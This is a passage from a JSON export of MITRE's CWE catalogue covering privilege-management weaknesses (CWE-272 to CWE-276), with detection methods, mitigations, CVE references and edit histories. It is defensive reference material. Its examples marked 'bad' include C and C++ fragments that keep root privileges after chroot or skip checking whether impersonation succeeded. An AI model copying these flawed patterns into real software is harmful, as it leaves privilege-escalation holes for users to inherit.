category.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"272":{"attr":{"@_ID":"272","@_Name":"Least Privilege Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"271","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality"],"Impact":["Gain Privileges or Assume Identity","Read Application Data","Read Files or Directories"],"Note":"An attacker may be able to access resources with the elevated privilege that could not be accessed with the attacker\'s original privileges. This is particularly likely in conjunction with another flaw, such as a buffer overflow."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Permission Manifest Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-48"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Follow the principle of least privilege when assigning access rights to entities in a software system."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"setuid(0);setuid(old_uid);","xhtml:br":["","","",""],"xhtml:i":["// Do some important stuff","// Do some non privileged stuff."]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-98"},"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Least Privilege Violation"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to drop privileges when reasonable"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS02-C","Entry_Name":"Follow the principle of least privilege"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC00-J","Entry_Name":"Do not allow privileged blocks to leak sensitive information across a trust boundary"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP36","Entry_Name":"Privilege"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":[{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Other"},"xhtml:p":["If system privileges are not dropped when it is reasonable to do so, this is not a vulnerability by itself. According to the principle of least privilege, access should be allowed only when it is absolutely necessary to the function of a given system, and only for the minimal necessary amount of time. Any further allowance of privilege widens the window of time during which a successful exploitation of the system will provide an attacker with that same privilege. If at all possible, limit the allowance of system privilege to small, simple sections of code that may be called atomically.","When a program calls a privileged function, such as chroot(), it must first acquire root privilege. As soon as the privileged operation has completed, the program should drop root privilege and return to the privilege level of the invoking user."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"273":{"attr":{"@_ID":"273","@_Name":"Improper Check for Dropped Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded.","Extended_Description":"If the drop fails, the software will continue to run with the raised privileges, which might provide additional access to unprivileged users.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"271","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"252","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"In Windows based environments that have access control, impersonation is used so that access checks can be performed on a client identity by a server with higher privileges. By impersonating the client, the server is restricted to client-level security -- although in different threads it may have much higher privileges."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","This issue is likely to occur in restrictive environments in which the operating system or application provides fine-grained control over privilege management."]}}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped."},{"Scope":["Access Control","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Hide Activities"],"Note":"If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-53"},"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"In Windows, make sure that the process token has the SeImpersonatePrivilege(Microsoft Server 2003). Code that relies on impersonation for security must ensure that the impersonation succeeded, i.e., that a proper privilege demotion happened."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to take on the privileges of a user before creating a file, thus avoiding performing the action with unnecessarily high privileges:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"bool DoSecureStuff(HANDLE hPipe) {}","xhtml:div":{"#text":"bool fDataWritten = false;ImpersonateNamedPipeClient(hPipe);HANDLE hFile = CreateFile(...);/../RevertToSelf()/../","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"The call to ImpersonateNamedPipeClient may fail, but the return value is not checked. If the call fails, the code may execute with higher privileges than intended. In this case, an attacker could exploit this behavior to write a file to a location that the attacker does not have access to."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check whether privileges were dropped successfully"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS37-C","Entry_Name":"Ensure that privilege relinquishment is successful","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Background_Details, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Failure to Check Whether Privileges Were Dropped Successfully","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Check for Successfully Dropped Privileges","attr":{"@_Date":"2009-05-27"}}]}},"274":{"attr":{"@_ID":"274","@_Name":"Improper Handling of Insufficient Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"271","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"280","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1564","Description":"System limits are not properly enforced after privileges are dropped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1564"},{"Reference":"CVE-2005-3286","Description":"Firewall crashes when it can\'t read a critical memory block that was protected by a malicious process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3286"},{"Reference":"CVE-2005-1641","Description":"Does not give admin sufficient privileges to overcome otherwise legitimate user actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1641"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient privileges"}},"Notes":{"Note":[{"#text":"CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.","attr":{"@_Type":"Maintenance"}},{"#text":"Overlaps dropped privileges, insufficient permissions.","attr":{"@_Type":"Relationship"}},{"#text":"This has a layering relationship with Unchecked Error Condition and Unchecked Return Value.","attr":{"@_Type":"Theoretical"}},{"#text":"Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Maintenance_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationship_Notes, Theoretical_Notes"}],"Previous_Entry_Name":[{"#text":"Insufficient Privileges","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Insufficient Privileges","attr":{"@_Date":"2009-05-27"}}]}},"276":{"attr":{"@_ID":"276","@_Name":"Incorrect Default Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During installation, installed file permissions are set to allow anyone to modify those files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Installation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inter-application Flow Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria","Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Forced Path Execution"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"The architecture needs to access and modification attributes for files to only those users who actually require those actions."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1941","Description":"Executables installed world-writable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1941"},{"Reference":"CVE-2002-1713","Description":"Home directories installed 